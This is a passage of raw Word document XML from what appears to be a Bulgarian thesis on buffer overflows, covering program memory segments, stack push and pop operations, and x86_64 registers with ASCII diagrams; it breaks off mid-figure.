    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">BSS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Подобен, с изключение на това, че в него паметта не е инициализирана.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Heap </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Динамичната памет на една програма - памет по време на изпълнение на програмата. Нейният размер не е постоянен, като може да бъде разширяван или смаляван. В началото там е празно и функции като malloc и free могат да променят размера на тази памет, който нараства</w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>към края на stack сегмента.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Stack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Статичната памет на една програма - тук се съхранява контролната информация, необходима на една програма, както и статично заделени променливи. Нейният размер също не е постоянен и операционната система се грижи за преоразмеряването му. Намира се в противоположния край на паметта от heap сегмента и расте към него.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Темата за виртуална памет е изключително широка и горното е много опростено обобщение. Има много детайли, но те са извъ</w:t>
      </w:r>
      <w:r>
        <w:t>н обхвата на дипломната работа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DC3933" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Съществуват два основни вида препълване на буфер: stack- и heap-базирани. Принципът на работа и на двата е един и същ, но начинът на експлоатация е различен. Исторически, както и за целта на дипломната работа, stack-базираният е от по-голям интерес, заради контролната информация в него. Също така има разлики между архитектурите, но общият начин на работа е еднакъв. Една от най-разпространената архитектури в днешно време е amd64 или x86_64, (наименованията са взаимозаменяеми). Тя се използва в настолните компютри и сървърите, където почти няма алтернативи. Широката </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>ѝ</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> разпространеност я прави много удобна за експлоатация на уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00B829C8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc3540747"/>
      <w:r w:rsidRPr="00B829C8">
        <w:t>Stack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Програмният стек (stack) е място от паметта на всеки процес, където той трупа информация по време на изпълнението си. С него са възможни две операции - добавяне най-отгоре (push) и махане на най-горния елемент (pop). В най-простия си вид той се използва за съхранение на променливи и контролна информация за продължение на изпълнение. В днешно време той е неразделна част от работата на езици като C. Те го използват за съхранение на информация необходима за работата на функции. В отделните операционни системите следват различни конвенции за разположението на такава информация, като за езика C при Linux и повечето Unix подобни, това е “System V”</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="6"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>][</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="7"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> конвенцията.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Важна особеност е, че в зависимост от архитектурата, стекът може да расте “нагоре” или “надолу”. “Нагоре” означава, че стекът започва от най-малкия </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">възможен адрес и всяка push операция води до по-високи адреси. “Надолу” е обратният процес- започва от най-високия адрес и расте към по-ниски.                               </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    +---------------+                       +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    |    data 0     |                       |    data 0     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    +---------------+        push rax       +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    |    data 1     |----------------------&gt;|    data 1     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    +---------------+                       +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    |    data 2     |   rsp                 |    data 2     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    +---------------+&lt;------                +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                            |   new data    |   rsp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                            +---------------+&lt;------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rax:|   new data    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Push </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>операция на стек</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_x6r70xq9ub7w" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    +---------------+                       +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    |    data 0     |                       |    data 0     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    +---------------+        pop rax        +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    |    data 1     |----------------------&gt;|    data 1     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    +---------------+                       +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    |    data 2     |                       |    data 2     |   rsp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    +---------------+                       +---------------+&lt;------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    |   new data    |   rsp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    +---------------+&lt;------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                            +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                        rax:|   new data    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="005E60F7" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                            +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve">\s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Pop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>операция на стек</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc3540748"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Особености</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> при x86_64</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>В дипломната работа се разглежда архитектура x86_64. Следват специфики, к</w:t>
      </w:r>
      <w:r>
        <w:t>оито се използват в останалата ѝ</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> част.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>За фамилията x86, стекът  расте “надолу”, тоест неговото начало се намира в края на най-високия адрес и той расте към по-ниски адреси. Адресът на текущата позиция на стека се съхранява в регистър stack pointer или rsp (диаграмата),а frame pointer или rfp дефинира къде започва информацията на текущия кадър, обикновено функция. Адресът на следващата инструкция се пази в instruction pointer или rip.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Например, ако началото на стека се намира на адрес 0xFFFF, то началото на една 4 байтова дума ще се намира на адрес 0xFFFB и rsp ще сочи в 0xFFFB.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Ако изпълняваната инструкция е </w:t>
      </w:r>
      <w:r w:rsidRPr="00543FBF">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>xorl %ecx,%ecx (байтове \x31 \xc9)</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> и се намира на адрес 0x4000B0, то стойността на rip ще е 0x4000B2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_60g3tn3rb3j0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">               +----+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">               |\x0c|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">               +----+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">               |\xe9|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">               +----+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>subl $0xc,%ecx |\x83|   rip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">               +----+&lt;------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">               |\xc9| 0x4000B2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
